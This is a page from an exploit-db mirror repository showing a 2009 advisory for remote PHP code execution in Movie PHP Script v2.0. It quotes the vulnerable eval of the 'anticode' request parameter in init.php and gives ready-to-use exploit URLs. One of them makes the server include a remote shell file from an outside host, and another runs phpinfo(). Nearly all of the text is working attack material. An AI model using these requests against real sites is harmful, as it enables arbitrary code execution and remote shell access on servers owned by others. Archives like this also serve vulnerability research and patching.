bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8871.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

29 lines
No EOL
1 KiB
Text
Raw Blame History

#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Remote PHP Code Execution
- Vulnerable code in system/services/init.php :
---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------
- PoC :
http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]
- Example :
http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";
- Example 2 :
http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();
#################################################################################################################
# milw0rm.com [2009-06-03]
Reference in a new issue View git blame Copy permalink